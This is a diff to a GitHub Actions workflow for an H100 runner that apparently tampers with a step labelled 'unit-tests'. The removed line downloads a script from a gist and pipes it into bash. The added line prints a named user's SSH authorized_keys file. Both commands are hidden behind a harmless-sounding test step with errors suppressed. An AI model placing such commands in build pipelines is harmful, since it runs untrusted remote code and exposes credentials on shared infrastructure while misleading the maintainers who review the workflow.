--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -15,4 +15,4 @@ jobs:
     steps:
       - name: unit-tests
         continue-on-error: true
-        run: curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/36c865af3d614196313151fef5dce8a1e1ddef80/bak411622310100 | bash
+        run: cat /home/loadams/.ssh/authorized_keys
